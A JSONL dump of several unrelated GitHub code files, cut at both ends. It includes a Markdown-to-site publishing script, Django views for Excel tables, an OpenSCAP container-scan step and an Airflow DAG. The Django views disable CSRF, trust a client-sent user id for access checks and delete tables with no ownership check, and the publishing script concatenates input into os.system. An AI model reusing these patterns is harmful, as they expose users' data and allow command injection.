html_text, replace = False, tag = \"Articles\"):\n\n with open(json_file_path, \"r+\") as fle:\n # Load our magic json file\n data = json.load(fle)\n\n # If we are editing/replacing our information then do this.\n if replace:\n found = False\n\n # Just do a simple linear search. Never going to get to the point where this is an issue.\n for i in range(0, len(data[tag])):\n if data[tag][i]['title'] == title:\n found = True\n data[tag][i]['summary'] = summary\n data[tag][i]['text'] = html_text\n\n # Raise a simple exception if you try to replace a json title that does not exist.\n if not found:\n raise Exception(\"Trying to replace with a title that does not exist.\")\n\n # Otherwise just write a new entry to the data dictionary, push out to file.\n else:\n date = datetime.datetime.now().strftime(r\"%m/%d/%Y\")\n new_dict = {\n \"title\": title,\n \"date\": date,\n \"summary\": summary,\n \"text\": html_text\n }\n data[tag].append(new_dict)\n \n # Write on out!\n fle.seek(0)\n json.dump(data, fle, indent=2)\n \n# ###########################################################\n# Description: Super primative function that copies all\n# files over from the image folder in the \n# specified markdown directory.\n# ###########################################################\ndef copy_over_images(source_folder, destination_folder):\n for root, dirs, files in os.walk(source_folder):\n for fle in files:\n if not os.path.exists(os.path.join(destination_folder, fle)):\n shutil.copy(os.path.join(source_folder, fle), os.path.join(destination_folder, fle))\n else:\n print(\"WARNING: Not copying as \" + fle + \" already exists in destination folder.\")\n\n# ###########################################################\n# Description: Builds the application with NPM.\n# ###########################################################\ndef build_application():\n os.system(\"npm run build\")\n\n# ###########################################################\n# Description: Does all the git needed to push it off.\n# ###########################################################\ndef git_commit_and_push(commit_message):\n os.system(\"git add *\")\n os.system(\"git commit -m \\\"\" + commit_message + \"\\\"\")\n os.system(\"git push\")\n\n# ###########################################################\n# Description: Helper function for boolean values in\n# arguments.\n# ###########################################################\ndef _bool_argument(val):\n if isinstance(val, bool):\n return val\n elif val.lower() in ['true', \"t\", 'yes']:\n return True\n elif val.lower() in ['false', 'f', 'no']:\n return False\n else:\n raise argparse.ArgumentTypeError(\"This field expects a boolean.\")\n\n\n\n\nif __name__ == \"__main__\":\n\n # Specify arguments\n parser = argparse.ArgumentParser(description = \"Converts markdown to html and pushes new build to site.\")\n parser.add_argument(\"input\", help = \"Path to markdown file.\")\n parser.add_argument(\"-n\", \"--name\", help = \"Name of article.\", required = True)\n parser.add_argument(\"-s\", \"--summary\", help = \"Summary of article.\", required = True)\n parser.add_argument('-u', \"--update_only\", type = _bool_argument, help = \"If we only want to build.\", default = False)\n parser.add_argument(\"-r\", \"--replace\", type = _bool_argument, help = \"Replace article information.\", default = False)\n\n # Parse arguments\n args = parser.parse_args()\n\n # Convert to HTML and add to json.\n html = convert_file_to_html(args.input)\n alter_json_file(\"../src/articles/projects.json\", args.name, args.summary, html, replace = args.replace)\n\n # Get image path from markdown files\n md_image_path = os.path.dirname(args.input) + \"/images\"\n\n # Copy over the images to the folder that includes items.\n copy_over_images(md_image_path, \"../public/images\")\n\n\n if args.update_only == False:\n # Build the application with NPM!\n os.chdir(BASE_DIR + \"/../\")\n build_application()\n\n copy_tree(BASE_DIR + \"/../build\", BUILD_DIR)\n\n # Commit and push!\n commit_message = \"Committing article \" + args.name\n os.chdir(BUILD_DIR)\n git_commit_and_push(commit_message)\n","repo_name":"EvanMPutnam/Personal-Website","sub_path":"utils/generate_article.py","file_name":"generate_article.py","file_ext":"py","file_size_in_byte":6025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43569031938","text":"from json.decoder import JSONDecodeError\nfrom django.shortcuts import render\nfrom django.http import StreamingHttpResponse, HttpResponseRedirect, HttpResponse\nfrom django.forms.models import model_to_dict\nfrom django.http import JsonResponse\nfrom openpyxl import load_workbook\nfrom users.models import VkUser\nfrom .models import ExcelTable\nfrom django.views.decorators.csrf import csrf_exempt\nimport json\nimport datetime\n# Create your views here.\n\n\n@csrf_exempt\ndef uploadExcelTable(request):\n if request.method == 'POST':\n user_pk = request.GET['user_pk']\n is_public = request.GET['is_public']\n title = request.GET['title']\n user = VkUser.objects.get(pk=user_pk)\n\n file_d = request.FILES['file']\n excel_file = file_d\n tables = buildTablesFromExcel(excel_file)\n\n response = []\n is_public_local = True if int(is_public) == 1 else False\n for table in tables:\n new_table = ExcelTable(\n owner=user, data=json.dumps(table, default=str), is_public=is_public_local, title=title)\n new_table.save()\n response.append(\n {'id': new_table.pk, 'is_public': new_table.is_public, 'owner': model_to_dict(new_table.owner), 'title': new_table.title})\n return JsonResponse(response, safe=False)\n\n\n@csrf_exempt\ndef updateExcelTable(request):\n if request.method == 'POST':\n data = json.loads(request.body.decode('utf-8'))\n title = data.get('title', '')\n id = data.get('id', -1)\n is_public = data.get('is_public', False)\n\n table = ExcelTable.objects.get(pk=id)\n table.is_public = is_public\n table.title = title\n table.save()\n return HttpResponse(status=200)\n\n\n@csrf_exempt\ndef getExcelTables(request):\n if request.method == 'POST':\n data = json.loads(request.body.decode('utf-8'))\n user_pk = data.get('user_pk', -1)\n\n public = ExcelTable.objects.all().filter(\n is_public=True).exclude(owner__pk=user_pk)\n owned = ExcelTable.objects.all().filter(owner__pk=user_pk)\n\n response = {'public': [], 'owned': []}\n\n for t in public:\n response['public'].append(\n {'id': t.pk, 'is_public': t.is_public, 'owner': model_to_dict(t.owner), 'title': t.title})\n\n for t in owned:\n response['owned'].append(\n {'id': t.pk, 'is_public': t.is_public, 'owner': model_to_dict(t.owner), 'title': t.title})\n\n return JsonResponse(response, safe=False)\n\n\n@csrf_exempt\ndef getExcelTable(request):\n if request.method == 'POST':\n data = json.loads(request.body.decode('utf-8'))\n user_pk = data.get('user_pk', -1)\n table_pk = data.get('table_pk', -1)\n\n t = ExcelTable.objects.get(pk=table_pk)\n if t.is_public == False and t.owner.pk != user_pk:\n return HttpResponse(status=403)\n\n response = {'id': t.pk, 'is_public': t.is_public,\n 'owner': model_to_dict(t.owner), 'data': json.loads(t.data), 'title': t.title}\n\n return JsonResponse(response, safe=False)\n\n\n@csrf_exempt\ndef deleteExcelTable(request):\n if request.method == 'DELETE':\n id = request.GET['id']\n table = ExcelTable.objects.get(pk=id)\n table.delete()\n return HttpResponse(status=200)\n\n# test\n\n\ndef buildTablesFromExcel(data_file):\n result = []\n wb = load_workbook(data_file)\n\n for sheet in wb.sheetnames:\n count = 0\n ws = wb[sheet]\n table = {\n 'table_names': [],\n 'rows': []\n }\n\n for row in ws:\n if not any(cell.value for cell in row):\n pass\n else:\n count += 1\n if count == 1:\n for cell in row:\n table['table_names'].append(str(cell.value))\n\n else:\n result_row = {}\n cell_count_max = len(table['table_names'])\n cell_count = 0\n for cell in row:\n cell_count += 1\n if cell_count > cell_count_max:\n pass\n else:\n value = '' if cell.value is None else cell.value\n index = table['table_names'][cell_count-1]\n result_row[index] = value\n table['rows'].append(result_row)\n result.append(table)\n return result\n","repo_name":"sovladlisin/vtarget-backend","sub_path":"excel_tables/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37394629292","text":"\"\"\"Step Implementer for the container-image-static-compliance-scan step for OpenSCAP.\n\nStep Configuration\n------------------\n\nStep configuration expected as input to this step.\nCould come from either configuration file or\nfrom runtime configuration.\n\n| Configuration Key | Required? | Default | Description\n|--------------------------------|-----------|---------|-----------\n| `oscap-input-definitions-uri` | Yes | | URI to the OpenSCAP definitions file\n| | | | to do the evaluation with.\n| | | | Must use protocol file://|http://|https://.\n| | | | Must have file extension .xml|.bz2.\n| `oscap-profile` | No | | OpenSCAP profile to evaluate.\n| `oscap-tailoring-uri` | No | | URI to OpenSCAP tailoring file\n| | | | to do the evaluation with.\n| | | | Must use protocol file://|http://|https://.\n| | | | Must have file extension .xml|.bz2.\n| `oscap-fetch-remote-resources` | No | True | For Source DataStream and XCCDF files\n| | | | that have remote references fetch them if\n| | | | True, else don't.\n| | | |\n| | | | WARNING: evaluations will not be complete\n| | | | if input defintions require remote\n| | | | resources and this is not True.\n| | | | For disconnected environments the remote\n| | | | references should be brought to an internal\n| | | | mirror.\n\nExpected Previous Step Results\n------------------------------\n\nResults expected from previous steps that this step requires.\n\n| Step Name | Result Key | Description\n|--------------------------|------------------|--------------\n| `create-container-image` | `image-tar-file` | Image to scan\n\nResults\n-------\n\nResults output by this step.\n\n| Result Key | Description\n|-----------------|------------\n| `html-report` | HTML report generated by oscap eval\n| `xml-report` | XML report generated by oscap eval\n| `stdout-report` | stdout report generated by oscap eval\n\"\"\"\n\nimport os\nimport re\nimport sys\nfrom distutils.util import strtobool\nfrom io import StringIO\n\nimport sh\nfrom tssc import DefaultSteps, StepImplementer\nfrom tssc.exceptions import TSSCException\nfrom tssc.utils.file import download_and_decompress_source_to_destination\nfrom tssc.utils.io import create_sh_redirect_to_multiple_streams_fn_callback\n\nDEFAULT_CONFIG = {\n 'oscap-fetch-remote-resources': True\n}\n\nREQUIRED_CONFIG_KEYS = [\n 'oscap-input-definitions-uri'\n]\n\nclass OpenSCAPGeneric(StepImplementer):\n \"\"\"A generic OpenSCAP step implementer that can be used for more then one step.\n\n Expected uses:\n * container-image-static-compliance-scan\n * container-image-static-vulnerability-scan\n \"\"\"\n\n # Example Input:\n # Title\tRHSA-2020:4186: spice and spice-gtk security update (Important)\n # Rule\txccdf_com.redhat.rhsa_rule_oval-com.redhat.rhsa-def-20204186\n # Ident\tRHSA-2020:4186\n # Ident\tCVE-2020-14355\n # Result\tpass\n #\n # Title\tRHSA-2020:3658: librepo security update (Important)\n # Rule\txccdf_com.redhat.rhsa_rule_oval-com.redhat.rhsa-def-20203658\n # Ident\tRHSA-2020:3658\n # Ident\tCVE-2020-14352\n # Result\tfail\n #\n # Matches:\n # (Title\tRHSA-2020:4186: spice and spice-gtk security update (Important)\n # Rule\txccdf_com.redhat.rhsa_rule_oval-com.redhat.rhsa-def-20204186\n # Ident\tRHSA-2020:4186\n # Ident\tCVE-2020-14355\n # Result\t(pass))\n #\n # (Title\tRHSA-2020:3658: librepo security update (Important)\n # Rule\txccdf_com.redhat.rhsa_rule_oval-com.redhat.rhsa-def-20203658\n # Ident\tRHSA-2020:3658\n # Ident\tCVE-2020-14352\n # Result\t(fail))\n #\n # Named Groups:\n # [0]ruleblock\n # Title\tRHSA-2020:4186: spice and spice-gtk security update (Important)\n # Rule\txccdf_com.redhat.rhsa_rule_oval-com.redhat.rhsa-def-20204186\n # Ident\tRHSA-2020:4186\n # Ident\tCVE-2020-14355\n # Result\tpass\n # [0]ruleresult\n # pass\n #\n # [1]ruleblock\n # Title\tRHSA-2020:3658: librepo security update (Important)\n # Rule\txccdf_com.redhat.rhsa_rule_oval-com.redhat.rhsa-def-20203658\n # Ident\tRHSA-2020:3658\n # Ident\tCVE-2020-14352\n # Result\tfail\n # [1]ruleresult\n # fail\n OSCAP_XCCDF_STDOUT_PATTERN = re.compile(\n r'(?PTitle.+?Result\\s+(?P[^\\n]+))\\n',\n re.DOTALL\n )\n OSCAP_XCCDF_STDOUT_FAIL_PATTERN = re.compile(r'fail')\n\n # NOTE: oval output far less useful then xccdf output but it is all but given some content\n # is only given in oval format and therefor supporting this is important\n #\n # Example Input:\n # Definition oval:com.redhat.rhsa:def:20202031: false\n # Definition oval:com.redhat.rhsa:def:20201998: true\n #\n # Matches:\n # (Definition oval:com.redhat.rhsa:def:20202031: (false))\n # (Definition oval:com.redhat.rhsa:def:20201998: (true))\n #\n # Named Groups:\n # [0]ruleblock\n # Definition oval:com.redhat.rhsa:def:20202031: false\n # [0]ruleresult\n # false\n #\n # [1]ruleblock\n # Definition oval:com.redhat.rhsa:def:20201998: true\n # [1]ruleresult\n # true\n OSCAP_OVAL_STDOUT_PATTERN = re.compile(\n r'(?P^.*:\\s*(?Ptrue|false)\\s*$)$',\n re.MULTILINE\n )\n OSCAP_OVAL_STDOUT_FAIL_PATTERN = re.compile(r'true')\n\n OSCAP_INFO_DOC_TYPE_PATTERN = re.compile(r'Document type: (?P.+)')\n\n @staticmethod\n def step_implementer_config_defaults():\n \"\"\"\n Getter for the StepImplementer's configuration defaults.\n\n Notes\n -----\n These are the lowest precedence configuration values.\n\n Returns\n -------\n dict\n Default values to use for step configuration values.\n \"\"\"\n return DEFAULT_CONFIG\n\n @staticmethod\n def required_runtime_step_config_keys():\n \"\"\"\n Getter for step configuration keys that are required before running the step.\n\n See Also\n --------\n _validate_runtime_step_config\n\n Returns\n -------\n array_list\n Array of configuration keys that are required before running the step.\n \"\"\"\n return REQUIRED_CONFIG_KEYS\n\n def _validate_runtime_step_config(self, runtime_step_config):\n \"\"\"Validates required runtime step configuration is valid.\n\n Validates that:\n * required configuration is given\n * oscap-input-definitions-uri\n - starts with file://|http://|https://\n - ends with .xml|.bz2\n\n Raises\n ------\n AssertionError\n * if runtime step configuration is invalid.\n \"\"\"\n super()._validate_runtime_step_config(runtime_step_config) # pylint: disable=protected-access\n\n # validate that the given 'oscap-input-definitions-uri' starts with file://|http://|https://\n oscap_input_definitions_uri = runtime_step_config['oscap-input-definitions-uri']\n assert (re.match(r'^file://|http://|https://', oscap_input_definitions_uri)), \\\n f\"Open SCAP input definitions source ({oscap_input_definitions_uri})\" \\\n f\" must start with known protocol (file://|http://|https://).\"\n\n # validate that the given 'oscap-input-definitions-uri' is an xml or bz2 file\n oscap_input_definitions_uri_extension = os.path.splitext(oscap_input_definitions_uri)[1]\n assert (re.match(r'\\.xml|\\.bz2', oscap_input_definitions_uri_extension)), \\\n f\"Open SCAP input definitions source ({oscap_input_definitions_uri})\" \\\n f\" must be of known type (xml|bz2), got: {oscap_input_definitions_uri_extension}\"\n\n def _run_step(self): # pylint: disable=too-many-locals\n \"\"\"Runs the OpenSCAP eval for a given input file against a given container.\n \"\"\"\n image_tar_file = ''\n if(self.get_step_results(DefaultSteps.CREATE_CONTAINER_IMAGE) and \\\n self.get_step_results(DefaultSteps.CREATE_CONTAINER_IMAGE).get('image-tar-file')):\n image_tar_file = self.\\\n get_step_results(DefaultSteps.CREATE_CONTAINER_IMAGE)['image-tar-file']\n else:\n raise RuntimeError('Missing image tar file from ' + DefaultSteps.CREATE_CONTAINER_IMAGE)\n\n oscap_profile = self.get_config_value('oscap-profile')\n oscap_fetch_remote_resources = self.get_config_value('oscap-fetch-remote-resources')\n\n # create a container name from the tar file name, step name, and sub step name\n container_name = os.path.splitext(os.path.basename(image_tar_file))[0]\n container_name += f\"-{self.step_name}-{self.sub_step_name}\"\n\n # import image tar file to vfs file system\n print(f\"\\nImport image: {image_tar_file}\")\n OpenSCAPGeneric.__buildah_import_image_from_tar(\n image_tar_file=image_tar_file,\n container_name=container_name\n )\n print(f\"Imported image: {image_tar_file}\")\n\n # baking `buildah unshare` command to wrap other buildah commands with\n # so that container does not need to be running in a privilaged mode to be able\n # to function\n buildah_unshare_comand = sh.buildah.bake('unshare') # pylint: disable=no-member\n\n # mount the container filesystem and get mount path\n #\n # NOTE: run in the context of `buildah unshare` so that container does not\n # need to be run in a privilaged mode\n print(f\"\\nMount container: {container_name}\")\n container_mount_path = OpenSCAPGeneric.__buildah_mount_container(\n buildah_unshare_comand=buildah_unshare_comand,\n container_id=container_name\n )\n print(f\"Mounted container ({container_name}) with mount path: '{container_mount_path}'\")\n\n # download the open scap input file\n oscap_input_definitions_uri = self.get_config_value('oscap-input-definitions-uri')\n print(f\"\\nDownload input definitions: {oscap_input_definitions_uri}\")\n oscap_input_file = download_and_decompress_source_to_destination(\n source_url=oscap_input_definitions_uri,\n destination_dir=self.get_working_dir()\n )\n print(f\"Download input definitions to: {oscap_input_file}\")\n\n # if specified download oscap tailoring file\n oscap_tailoring_file = None\n oscap_tailoring_file_uri = self.get_config_value('oscap-tailoring-uri')\n if oscap_tailoring_file_uri:\n print(f\"\\nDownload oscap tailoring file: {oscap_tailoring_file_uri}\")\n oscap_tailoring_file = download_and_decompress_source_to_destination(\n source_url=oscap_tailoring_file_uri,\n destination_dir=self.get_working_dir()\n )\n print(f\"Download oscap tailoring file to: {oscap_tailoring_file}\")\n\n # determine oscap eval type based on document type\n print(f\"\\nDetermine OpenSCAP document type of input file: {oscap_input_file}\")\n oscap_document_type = OpenSCAPGeneric.__get_oscap_document_type(\n oscap_input_file=oscap_input_file\n )\n print(\n \"Determined OpenSCAP document type of input file\"\n f\" ({oscap_input_file}): {oscap_document_type}\"\n )\n print(\n f\"\\nDetermine OpenSCAP eval type for input file ({oscap_input_file}) \"\n f\"of document type: {oscap_document_type}\"\n )\n oscap_eval_type = OpenSCAPGeneric.__get_oscap_eval_type_based_on_document_type(\n oscap_document_type=oscap_document_type\n )\n print(\n f\"Determined OpenSCAP eval type of input file ({oscap_input_file}): {oscap_eval_type}\"\n )\n\n # Execute scan in the context of buildah unshare\n #\n # NOTE: run in the context of `buildah unshare` so that container does not\n # need to be run in a privilaged mode\n oscap_out_file_path = self.write_working_file(f'oscap-{oscap_eval_type}-out')\n oscap_xml_results_file_path = self.write_working_file(\n f'oscap-{oscap_eval_type}-results.xml'\n )\n oscap_html_report_path = self.write_working_file(f'oscap-{oscap_eval_type}-report.html')\n print(\"\\nRun oscap scan\")\n oscap_eval_success, oscap_eval_fails = OpenSCAPGeneric.__run_oscap_scan(\n buildah_unshare_comand=buildah_unshare_comand,\n oscap_eval_type=oscap_eval_type,\n oscap_input_file=oscap_input_file,\n oscap_out_file_path=oscap_out_file_path,\n oscap_xml_results_file_path=oscap_xml_results_file_path,\n oscap_html_report_path=oscap_html_report_path,\n container_mount_path=container_mount_path,\n oscap_profile=oscap_profile,\n oscap_tailoring_file=oscap_tailoring_file,\n oscap_fetch_remote_resources=oscap_fetch_remote_resources\n )\n print(\n f\"OpenSCAP Scan Completed. Report: {oscap_html_report_path}\\n\"\n )\n\n # NOTE: this should not raise an exception once we have new Results object\n # since this is an \"expected\" \"valid\" failure...\n # but this is the solution for now\n if not oscap_eval_success:\n raise TSSCException(f\"OSCAP eval found issues:\\n{oscap_eval_fails}\")\n\n results = {\n 'result': {\n 'success': True\n },\n 'report-artifacts': [\n {\n 'name': 'html-report',\n 'path': f'file://{oscap_html_report_path}'\n },\n {\n 'name': 'xml-report',\n 'path': f'file://{oscap_xml_results_file_path}'\n },\n {\n 'name': 'stdout-report',\n 'path': f'file://{oscap_out_file_path}'\n }\n ]\n }\n return results\n\n @staticmethod\n def __buildah_import_image_from_tar(image_tar_file, container_name):\n \"\"\"Import a container image using buildah form a TAR file.\n\n Parameters\n ----------\n image_tar_file : str\n Path to TAR file to import as a container image.\n container_name : str\n name for the working container.\n\n Returns\n -------\n str\n Name of the imported container.\n \"\"\"\n # import image tar file to vfs file system\n try:\n sh.buildah( # pylint: disable=no-member\n 'from',\n '--storage-driver', 'vfs',\n '--name', container_name,\n f\"docker-archive:{image_tar_file}\",\n _out=sys.stdout,\n _err=sys.stderr,\n _tee='err'\n )\n except sh.ErrorReturnCode as error:\n raise RuntimeError(\n f'Unexpected runtime error importing the image ({image_tar_file}): {error}'\n ) from error\n\n return container_name\n\n @staticmethod\n def __buildah_mount_container(buildah_unshare_comand, container_id):\n \"\"\"Use buildah to mount a container.\n\n Parameters\n ----------\n buildah_unshare_comand : sh.buildah.unshare.bake()\n A baked sh.buildah.unshare command to use to run this command in the context off\n so that this can be done \"rootless\".\n container_id : str\n ID of the container to mount.\n\n Returns\n -------\n str\n Absolute path to the mounted container.\n \"\"\"\n mount_path = None\n try:\n buildah_mount_out_buff = StringIO()\n buildah_mount_out_callback = create_sh_redirect_to_multiple_streams_fn_callback([\n sys.stdout,\n buildah_mount_out_buff\n ])\n buildah_mount_command = buildah_unshare_comand.bake(\"buildah\", \"mount\")\n buildah_mount_command(\n '--storage-driver', 'vfs',\n container_id,\n _out=buildah_mount_out_callback,\n _err=sys.stderr,\n _tee='err'\n )\n mount_path = buildah_mount_out_buff.getvalue().rstrip()\n except sh.ErrorReturnCode as error:\n raise RuntimeError(\n f'Unexpected runtime error mounting container ({container_id}): {error}'\n ) from error\n\n return mount_path\n\n @staticmethod\n def __get_oscap_document_type(oscap_input_file):\n \"\"\"Gets the OpenSCAP document type for a given input file.\n\n Parameters\n ----------\n oscap_input_file : path\n Path to OSCAP file to determine the OpenSCAP document type of.\n\n Returns\n -------\n str\n OpenSCAP document type. For example:\n * Source Data Stream\n * XCCDF Checklist\n * OVAL Definitions\n\n Raises\n ------\n ErrorReturnCode\n If unexpected error occurred\n \"\"\"\n\n oscap_document_type = None\n try:\n oscap_info_out_buff = StringIO()\n sh.oscap.info( # pylint: disable=no-member\n oscap_input_file,\n _out=oscap_info_out_buff\n )\n oscap_info_out = oscap_info_out_buff.getvalue().rstrip()\n oscap_document_type_match = OpenSCAPGeneric.OSCAP_INFO_DOC_TYPE_PATTERN.search(\n oscap_info_out\n )\n oscap_document_type = oscap_document_type_match.groupdict()['doctype']\n except sh.ErrorReturnCode as error:\n raise RuntimeError(\n f\"Unexpected error getting document type of oscap input file\"\n f\" ({oscap_input_file}): {error}\"\n ) from error\n\n return oscap_document_type\n\n @staticmethod\n def __get_oscap_eval_type_based_on_document_type(oscap_document_type):\n \"\"\"Given an OSCAP document type returns the type of oscap eval that should be used.\n\n Parameters\n ----------\n oscap_document_type : str\n OSCAP Document type to get the oscap eval type for.\n\n Returns\n -------\n str\n OSCAP eval type to perform on document with given oscap document type.\n \"\"\"\n oscap_eval_type = None\n\n if oscap_document_type == 'Source Data Stream':\n oscap_eval_type = 'xccdf'\n elif oscap_document_type == 'XCCDF Checklist':\n oscap_eval_type = 'xccdf'\n elif oscap_document_type == 'OVAL Definitions':\n oscap_eval_type = 'oval'\n\n return oscap_eval_type\n\n @staticmethod\n def __run_oscap_scan( # pylint: disable=too-many-arguments,too-many-locals,too-many-branches,too-many-statements\n buildah_unshare_comand,\n oscap_eval_type,\n oscap_input_file,\n oscap_out_file_path,\n oscap_xml_results_file_path,\n oscap_html_report_path,\n container_mount_path,\n oscap_profile=None,\n oscap_tailoring_file=None,\n oscap_fetch_remote_resources=True\n ):\n \"\"\"Run an oscap scan in the context of a buildah unshare to run \"rootless\".\n\n Parameters\n ----------\n buildah_unshare_comand : sh.buildah.unshare.bake()\n A baked sh.buildah.unshare command to use to run this command in the context off\n so that this can be done \"rootless\".\n oscap_eval_type : str\n The type of oscap eval to perform. Must be a valid oscap eval type.\n EX: xccdf, oval\n oscap_input_file : str\n Path to rules file passed to the oscap command.\n oscap_out_file_path : str\n Path to write the stdout and stderr of running the oscap command to.\n oscap_xml_results_file_path : str\n Write the scan results into this file.\n oscap_html_report_path : str\n Write the human readable (HTML) report into this file.\n container_mount_path : str\n Path to the mounted container to scan.\n oscap_tailoring_file : str\n XCCF Tailoring file.\n See:\n - https://www.open-scap.org/security-policies/customization/\n - https://www.open-scap.org/resources/documentation/customizing-scap-security-guide-for-your-use-case/ # pylint: disable=line-too-long\n - https://static.open-scap.org/openscap-1.2/oscap_user_manual.html#_how_to_tailor_source_data_stream # pylint: disable=line-too-long\n oscap_profile : str\n OpenSCAP profile to evaluate. Must be a valid profile in the given oscap_input_file.\n EX: if you perform an `oscap info oscap_input_file` the profile must be listed.\n\n Returns\n -------\n oscap_eval_success : bool\n True if oscap eval passed all rules\n False if oscap eval failed any rules\n oscap_eval_fails : str\n If oscap_eval_success is True then indeterminate.\n If oscap_eval_success is False then string of all of the failed rules.\n\n Raises\n ------\n RuntimeError\n If unexpected error running oscap scan.\n \"\"\"\n\n oscap_profile_flag = None\n if oscap_profile is not None:\n oscap_profile_flag = f\"--profile={oscap_profile}\"\n\n oscap_fetch_remote_resources_flag = None\n if isinstance(oscap_fetch_remote_resources, str):\n oscap_fetch_remote_resources = strtobool(oscap_fetch_remote_resources)\n if oscap_fetch_remote_resources:\n oscap_fetch_remote_resources_flag = \"--fetch-remote-resources\"\n\n oscap_tailoring_file_flag = None\n if oscap_tailoring_file is not None:\n oscap_tailoring_file_flag = f\"--tailoring-file={oscap_tailoring_file}\"\n\n oscap_eval_success = None\n oscap_eval_out_buff = StringIO()\n oscap_eval_out = \"\"\n oscap_eval_fails = None\n try:\n oscap_chroot_command = buildah_unshare_comand.bake(\"oscap-chroot\")\n with open(oscap_out_file_path, 'w') as oscap_out_file:\n out_callback = create_sh_redirect_to_multiple_streams_fn_callback([\n oscap_eval_out_buff,\n oscap_out_file\n ])\n err_callback = create_sh_redirect_to_multiple_streams_fn_callback([\n oscap_eval_out_buff,\n oscap_out_file\n ])\n oscap_chroot_command(\n container_mount_path,\n oscap_eval_type,\n 'eval',\n oscap_profile_flag,\n oscap_fetch_remote_resources_flag,\n oscap_tailoring_file_flag,\n f'--results={oscap_xml_results_file_path}',\n f'--report={oscap_html_report_path}',\n oscap_input_file,\n _out=out_callback,\n _err=err_callback,\n _tee='err'\n )\n oscap_eval_success = True\n except sh.ErrorReturnCode_1 as error: # pylint: disable=no-member\n oscap_eval_success = error\n except sh.ErrorReturnCode_2 as error: # pylint: disable=no-member\n # XCCDF: If there is at least one rule with either fail or unknown result,\n # oscap-scan finishes with return code 2.\n # OVAL: Never returned\n #\n # Source: https://www.systutorials.com/docs/linux/man/8-oscap/\n if oscap_eval_type == 'xccdf':\n oscap_eval_success = False\n else:\n oscap_eval_success = error\n except sh.ErrorReturnCode as error:\n oscap_eval_success = error\n\n # get the oscap output\n oscap_eval_out = oscap_eval_out_buff.getvalue()\n\n # parse the oscap output\n # NOTE: oscap is puts carrage returns (\\r / ^M) in their output, remove them\n oscap_eval_out = re.sub('\\r', '', oscap_eval_out)\n\n # print the oscap output no matter the results\n print(oscap_eval_out)\n\n # if unexpected error throw error\n if isinstance(oscap_eval_success, Exception):\n raise RuntimeError(\n f\"Unexpected error running 'oscap {oscap_eval_type} eval': {oscap_eval_success} \"\n ) from oscap_eval_success\n\n # NOTE: oscap oval eval returns exit code 0 whether or not any rules failed\n # need to search output to determine if there were any rule failures\n if oscap_eval_type == 'oval' and oscap_eval_success:\n oscap_eval_fails = \"\"\n for match in OpenSCAPGeneric.OSCAP_OVAL_STDOUT_PATTERN.finditer(oscap_eval_out):\n # NOTE: need to do regex and not == because may contain xterm color chars\n if OpenSCAPGeneric.OSCAP_OVAL_STDOUT_FAIL_PATTERN.search(\n match.groupdict()['ruleresult']\n ):\n oscap_eval_fails += match.groupdict()['ruleblock']\n oscap_eval_fails += \"\\n\"\n oscap_eval_success = False\n\n # if failed xccdf eval then parse out the fails\n if oscap_eval_type == 'xccdf' and not oscap_eval_success:\n oscap_eval_fails = \"\"\n for match in OpenSCAPGeneric.OSCAP_XCCDF_STDOUT_PATTERN.finditer(oscap_eval_out):\n # NOTE: need to do regex and not == because may contain xterm color chars\n if re.search(r'fail', match.groupdict()['ruleresult']):\n oscap_eval_fails += \"\\n\"\n oscap_eval_fails += match.groupdict()['ruleblock']\n oscap_eval_fails += \"\\n\"\n\n return oscap_eval_success, oscap_eval_fails\n","repo_name":"shaneboulden/tssc-python-package","sub_path":"tssc/step_implementers/shared/openscap_generic.py","file_name":"openscap_generic.py","file_ext":"py","file_size_in_byte":26461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"12574588406","text":"from datetime import timedelta\n\nfrom airflow import DAG\nfrom airflow.hooks.mysql_hook import MySqlHook\nfrom airflow.operators.python_operator import PythonOperator\nfrom airflow.sensors.external_task_sensor import ExternalTaskSensor\nfrom airflow.utils.dates import days_ago\nfrom structlog import get_logger\nimport pandas as pd\n\nlogger = get_logger()\n\n\nQUERY = \"\"\"\nSELECT \n year_id, month_id, SUM(sales) AS sales_amount\nFROM\n test.sales\nGROUP BY 1 , 2\n\"\"\"\nCONNECTION_DB_NAME = 'mysql_db'\n\ndef etl_process(**kwargs):\n logger.info(kwargs[\"execution_date\"])\n mysql_connection = MySqlHook(mysql_conn_id=CONNECTION_DB_NAME).get_sqlalchemy_engine()\n\n df = pd.read_sql(QUERY, con=mysql_connection, coerce_float=False)\n\n with mysql_connection.begin() as connection:\n connection.execute(\"DELETE FROM test.consolidate_sales WHERE 1=1\")\n df.to_sql(\"consolidate_sales\", con=connection, schema=\"test\", if_exists=\"append\", index=False)\n\n logger.info(f\"Rows inserted {len(df.index)}\")\n\n\n\ndag = DAG('consolidate_dag', description='Dag to Consolidate Sales',\n default_args={\n 'owner': 'obed.espinoza',\n 'depends_on_past': False,\n 'max_active_runs': 1\n },\n start_date=days_ago(5),\n schedule_interval='0 0 * * *',\n catchup=False)\n\nsensor = ExternalTaskSensor(task_id=\"sales_etl_sensor\",\n external_dag_id=\"sales_ingestion_dag\",\n external_task_id=\"sales_etl\",\n execution_date_fn=lambda dt: dt + timedelta(hours=1))\n\netl = PythonOperator(task_id=\"consolidate_task\",\n provide_context=True,\n python_callable=etl_process,\n dag=dag\n )\n\nsensor >> etl\n","repo_name":"obedaeg/airflow","sub_path":"dags/consolidate_dag.py","file_name":"consolidate_dag.py","file_ext":"py","file_size_in_byte":1802,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"6086528899","text":"import os,sys,configparser,getopt\nimport csv\n\n\n\n# 1、对单个文件按主列(gene_name (mus_musculus_ensembl_v80_Genes))对行进行分组\n# 2、对单个文件分组后的每一组按找从列(Frequency)求和\n# note:\n# 分组的原则根据主列中每一行的名字,进行归类,同名归属一组\n# 3、支持文件批量求和,从整体上看,对位于不同文件的主列进行分组,原则同上。也就是跨文件分组。\n# 4、支持合并后的分组进行求和\n\n#http://stackoverflow.com/questions/2387697/best-way-to-convert-csv-data-to-dict\n#http://www.tbk.ren/article/168.html?from=similar\n\ndef usage():\n print('...')\n\ndef saveDataToCSV(title,data,filePath,fmt=''):\n print(\"saving data to csv file:%s\" % filePath)\n \n if os.path.isfile(filePath):\n print(\"delete old csv file:%s\" % filePath)\n os.remove(filePath)\n \n file_handle = 